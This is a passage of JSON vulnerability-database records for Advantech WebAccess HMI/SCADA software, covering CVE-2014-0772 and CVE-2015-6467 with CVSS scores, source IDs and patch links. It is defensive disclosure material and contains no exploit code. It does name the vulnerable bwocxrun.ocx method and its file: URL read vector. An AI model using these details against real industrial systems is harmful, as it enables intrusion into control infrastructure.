"cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001982" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-14-138" } ], "trust": 0.7 }, "cve": "CVE-2014-0772", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0772", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02266", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "719091cc-1edf-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7bf371-463f-11e9-a294-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "16660ba2-2352-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68265", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0772", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0772", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2014-0772", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2014-02266", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201404-177", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68265", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-138" }, { "db": "CNVD", "id": "CNVD-2014-02266" }, { "db": "VULHUB", "id": "VHN-68265" }, { "db": "JVNDB", "id": "JVNDB-2014-001982" }, { "db": "CNNVD", "id": "CNNVD-201404-177" }, { "db": "NVD", "id": "CVE-2014-0772" } ] }, "description": { "_id": null, "data": "The OpenUrlToBufferTimeout method in the BWOCXRUN.BwocxrunCtrl.1 ActiveX control in bwocxrun.ocx in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a file: URL. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2014-0772" }, { "db": "JVNDB", "id": "JVNDB-2014-001982" }, { "db": "ZDI", "id": "ZDI-14-138" }, { "db": "CNVD", "id": "CNVD-2014-02266" }, { "db": "BID", "id": "66749" }, { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68265" } ], "trust": 3.69 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-0772", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201404-177", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2014-02266", "trust": 1.2 }, { "db": "BID", "id": "66749", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001982", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2094", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-138", "trust": 0.7 }, { "db": "OSVDB", "id": "105570", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "719091CC-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "7D7BF371-463F-11E9-A294-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "16660BA2-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68265", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-138" }, { "db": "CNVD", "id": "CNVD-2014-02266" }, { "db": "VULHUB", "id": "VHN-68265" }, { "db": "BID", "id": "66749" }, { "db": "JVNDB", "id": "JVNDB-2014-001982" }, { "db": "CNNVD", "id": "CNNVD-201404-177" }, { "db": "NVD", "id": "CVE-2014-0772" } ] }, "id": "VAR-201404-0547", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02266" }, { "db": "VULHUB", "id": "VHN-68265" } ], "trust": 1.73470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02266" } ] }, "last_update_date": "2024-11-23T21:45:11.590000Z", "patch": { "_id": null, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess bwocxrun.ocx OpenUrlToBufferTimeout method patch for arbitrary file access vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44790" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-138" }, { "db": "CNVD", "id": "CNVD-2014-02266" }, { "db": "JVNDB", "id": "JVNDB-2014-001982" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68265" }, { "db": "JVNDB", "id": "JVNDB-2014-001982" }, { "db": "NVD", "id": "CVE-2014-0772" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0772" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0772" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105570" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-138" }, { "db": "CNVD", "id": "CNVD-2014-02266" }, { "db": "VULHUB", "id": "VHN-68265" }, { "db": "JVNDB", "id": "JVNDB-2014-001982" }, { "db": "CNNVD", "id": "CNNVD-201404-177" }, { "db": "NVD", "id": "CVE-2014-0772" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1", "ident": null }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-138", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-02266", "ident": null }, { "db": "VULHUB", "id": "VHN-68265", "ident": null }, { "db": "BID", "id": "66749", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-001982", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201404-177", "ident": null }, { "db": "NVD", "id": "CVE-2014-0772", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-05-19T00:00:00", "db": "ZDI", "id": "ZDI-14-138", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02266", "ident": null }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68265", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66749", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001982", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-177", "ident": null }, { "date": "2014-04-12T04:37:31.673000", "db": "NVD", "id": "CVE-2014-0772", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-05-19T00:00:00", "db": "ZDI", "id": "ZDI-14-138", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02266", "ident": null }, { "date": "2014-04-14T00:00:00", "db": "VULHUB", "id": "VHN-68265", "ident": null }, { "date": "2014-05-22T17:54:00", "db": "BID", "id": "66749", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001982", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-177", "ident": null }, { "date": "2024-11-21T02:02:46.933000", "db": "NVD", "id": "CVE-2014-0772", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-177" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess bwocxrun.ocx OpenUrlToBufferTimeout Method Arbitrary File Access Vulnerability", "sources": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02266" } ], "trust": 1.2 }, "type": { "_id": null, "data": "Information leakage", "sources": [ { "db": "IVD", "id": "719091cc-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf371-463f-11e9-a294-000c29342cb1" }, { "db": "IVD", "id": "16660ba2-2352-11e6-abef-000c29c66e3d" } ], "trust": 0.6 } }
var-201601-0134
Vulnerability from variot
Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code via vectors involving a browser plugin. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0134", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "db": "CNNVD", "id": "CNNVD-201601-323" }, { "db": "NVD", "id": "CVE-2015-6467" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006787" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ilya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher", "sources": [ { "db": "BID", "id": "80745" } ], "trust": 0.3 }, "cve": "CVE-2015-6467", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2015-6467", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CNVD-2016-00429", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "64df8e80-2351-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "VHN-84428", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "id": "CVE-2015-6467", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-6467", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2015-6467", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2016-00429", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-323", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-84428", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "VULHUB", "id": "VHN-84428" }, { "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "db": "CNNVD", "id": "CNNVD-201601-323" }, { "db": "NVD", "id": "CVE-2015-6467" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code via vectors involving a browser plugin. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2015-6467" }, { "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-84428" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-6467", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-323", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00429", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006787", "trust": 0.8 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64DF8E80-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-84428", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "VULHUB", "id": "VHN-84428" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "db": "CNNVD", "id": "CNNVD-201601-323" }, { "db": "NVD", "id": "CVE-2015-6467" } ] }, "id": "VAR-201601-0134", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "VULHUB", "id": "VHN-84428" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00429" } ] }, "last_update_date": "2024-11-23T21:43:23.666000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess arbitrary code execution vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70374" }, { "title": "Advantech WebAccess Fixes for arbitrary code execution vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59641" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "db": "CNNVD", "id": "CNNVD-201601-323" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2015-6467" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6467" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6467" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "VULHUB", "id": "VHN-84428" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "db": "CNNVD", "id": "CNNVD-201601-323" }, { "db": "NVD", "id": "CVE-2015-6467" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00429" }, { "db": "VULHUB", "id": "VHN-84428" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "db": "CNNVD", "id": "CNNVD-201601-323" }, { "db": "NVD", "id": "CVE-2015-6467" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64df8e80-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00429" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-84428" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-323" }, { "date": "2016-01-15T03:59:09.887000", "db": "NVD", "id": "CVE-2015-6467" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00429" }, { "date": "2016-01-20T00:00:00", "db": "VULHUB", "id": "VHN-84428" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006787" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-323" }, { "date": "2024-11-21T02:35:01.483000", "db": 